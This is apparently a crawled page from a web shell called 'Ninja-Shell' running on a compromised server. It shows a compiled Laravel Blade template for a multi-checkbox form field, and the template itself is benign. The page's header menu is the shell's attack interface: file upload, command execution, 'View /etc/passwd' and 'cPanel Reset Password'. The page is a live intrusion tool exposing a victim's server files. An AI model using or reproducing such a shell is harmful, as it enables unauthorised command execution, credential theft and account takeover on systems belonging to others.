{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www///arsu_theme/storage/framework/views/aa1ff9634e04c3bed81fb965b2d89988.php
<?php if(! $asDropdown && $choices): ?> <?php if (isset($component)) { $__componentOriginal20d878510d8f6b63da7004efc7cea55f = $component; } ?> <?php if (isset($attributes)) { $__attributesOriginal20d878510d8f6b63da7004efc7cea55f = $attributes; } ?> <?php $component = Illuminate\View\AnonymousComponent::resolve(['view' => 'a74ad8dfacd4f985eb3977517615ce25::form.fieldset','data' => ['class' => 'fieldset-for-multi-check-list']] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?> <?php $component->withName('core::form.fieldset'); ?> <?php if ($component->shouldRender()): ?> <?php $__env->startComponent($component->resolveView(), $component->data()); ?> <?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?> <?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?> <?php endif; ?> <?php $component->withAttributes(['class' => 'fieldset-for-multi-check-list']); ?> <div class="multi-check-list-wrapper"> <?php if (isset($attributes['class'])) { $attributes['class'] = str_replace('form-control', '', $attributes['class']); } if (is_string($value) && str_contains($value, ',')) { $value = explode(',', $value); } ?> <?php $__currentLoopData = $choices; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <?php $checked = is_array($value) ? in_array($key, $value) : ($key == $value); ?> <?php if (isset($component)) { $__componentOriginal424617256517489644ca6a2e02d16322 = $component; } ?> <?php if (isset($attributes)) { $__attributesOriginal424617256517489644ca6a2e02d16322 = $attributes; } ?> <?php $component = Illuminate\View\AnonymousComponent::resolve(['view' => 'a74ad8dfacd4f985eb3977517615ce25::form.checkbox','data' => ['id' => sprintf('%s-item-%s', Str::slug($name), $key),'name' => $name,'value' => $key,'label' => $item,'checked' => $checked,'inline' => $inline,'attributes' => new Illuminate\View\ComponentAttributeBag((array) $attributes)]] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?> <?php $component->withName('core::form.checkbox'); ?> <?php if ($component->shouldRender()): ?> <?php $__env->startComponent($component->resolveView(), $component->data()); ?> <?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?> <?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?> <?php endif; ?> <?php $component->withAttributes(['id' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute(sprintf('%s-item-%s', Str::slug($name), $key)),'name' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($name),'value' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($key),'label' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($item),'checked' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($checked),'inline' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($inline),'attributes' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute(new Illuminate\View\ComponentAttributeBag((array) $attributes))]); ?> <?php echo $__env->renderComponent(); ?> <?php endif; ?> <?php if (isset($__attributesOriginal424617256517489644ca6a2e02d16322)): ?> <?php $attributes = $__attributesOriginal424617256517489644ca6a2e02d16322; ?> <?php unset($__attributesOriginal424617256517489644ca6a2e02d16322); ?> <?php endif; ?> <?php if (isset($__componentOriginal424617256517489644ca6a2e02d16322)): ?> <?php $component = $__componentOriginal424617256517489644ca6a2e02d16322; ?> <?php unset($__componentOriginal424617256517489644ca6a2e02d16322); ?> <?php endif; ?> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <?php echo $__env->renderComponent(); ?> <?php endif; ?> <?php if (isset($__attributesOriginal20d878510d8f6b63da7004efc7cea55f)): ?> <?php $attributes = $__attributesOriginal20d878510d8f6b63da7004efc7cea55f; ?> <?php unset($__attributesOriginal20d878510d8f6b63da7004efc7cea55f); ?> <?php endif; ?> <?php if (isset($__componentOriginal20d878510d8f6b63da7004efc7cea55f)): ?> <?php $component = $__componentOriginal20d878510d8f6b63da7004efc7cea55f; ?> <?php unset($__componentOriginal20d878510d8f6b63da7004efc7cea55f); ?> <?php endif; ?> <?php else: ?> <?php $countSelected = count($value); $placeholder = Arr::get($attributes, 'placeholder') ?: trans('core/base::forms.select_placeholder'); if ($countSelected && $countSelected > 3) { $placeholder = trans('core/base::forms.count_selected', ['count' => $countSelected]); } ?> <div class="position-relative" data-bb-toggle="dropdown-checkboxes" <?php if($ajaxUrl): ?> data-ajax-url="<?php echo e($ajaxUrl); ?>" <?php endif; ?> data-name="<?php echo e($name); ?>" data-selected-text="<?php echo e(trans('core/base::forms.selected')); ?>" data-placeholder="<?php echo e($placeholder); ?>" > <span class="form-select text-truncate"><?php echo e($placeholder); ?></span> <?php if($ajaxUrl): ?> <div class="d-none multi-checklist-selected"> <?php $__currentLoopData = $value; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <input type="hidden" name="<?php echo e($name); ?>" value="<?php echo e($item); ?>"> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </div> <?php endif; ?> <input type="text" class="form-select" placeholder="<?php echo e(trans('core/table::table.search')); ?>" style="display: none"> <div class="dropdown-menu dropdown-menu-end w-100"> <div data-bb-toggle="tree-checkboxes"> <ul class="list-unstyled p-3 pb-0"> <?php if(! $ajaxUrl && ! empty($choices)): ?> <?php $__currentLoopData = $choices; $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $key => $item): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <li> <?php if (isset($component)) { $__componentOriginal424617256517489644ca6a2e02d16322 = $component; } ?> <?php if (isset($attributes)) { $__attributesOriginal424617256517489644ca6a2e02d16322 = $attributes; } ?> <?php $component = Illuminate\View\AnonymousComponent::resolve(['view' => 'a74ad8dfacd4f985eb3977517615ce25::form.checkbox','data' => ['id' => sprintf('%s-item-%s', Str::slug($name), $key),'name' => $name,'value' => $key,'label' => $item,'checked' => in_array($key, $value),'inline' => $inline,'attributes' => new Illuminate\View\ComponentAttributeBag((array) $attributes)]] + (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag ? (array) $attributes->getIterator() : [])); ?> <?php $component->withName('core::form.checkbox'); ?> <?php if ($component->shouldRender()): ?> <?php $__env->startComponent($component->resolveView(), $component->data()); ?> <?php if (isset($attributes) && $attributes instanceof Illuminate\View\ComponentAttributeBag && $constructor = (new ReflectionClass(Illuminate\View\AnonymousComponent::class))->getConstructor()): ?> <?php $attributes = $attributes->except(collect($constructor->getParameters())->map->getName()->all()); ?> <?php endif; ?> <?php $component->withAttributes(['id' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute(sprintf('%s-item-%s', Str::slug($name), $key)),'name' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($name),'value' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($key),'label' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($item),'checked' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute(in_array($key, $value)),'inline' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute($inline),'attributes' => \Illuminate\View\Compilers\BladeCompiler::sanitizeComponentAttribute(new Illuminate\View\ComponentAttributeBag((array) $attributes))]); ?> <?php echo $__env->renderComponent(); ?> <?php endif; ?> <?php if (isset($__attributesOriginal424617256517489644ca6a2e02d16322)): ?> <?php $attributes = $__attributesOriginal424617256517489644ca6a2e02d16322; ?> <?php unset($__attributesOriginal424617256517489644ca6a2e02d16322); ?> <?php endif; ?> <?php if (isset($__componentOriginal424617256517489644ca6a2e02d16322)): ?> <?php $component = $__componentOriginal424617256517489644ca6a2e02d16322; ?> <?php unset($__componentOriginal424617256517489644ca6a2e02d16322); ?> <?php endif; ?> </li> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> <?php else: ?> <div class="py-5"></div> <?php endif; ?> </ul> </div> </div> </div> <?php endif; ?> <?php /**PATH /var/www/arsu/platform/core/base/resources/views/forms/partials/multi-checklist.blade.php ENDPATH**/ ?>
./Ninja\.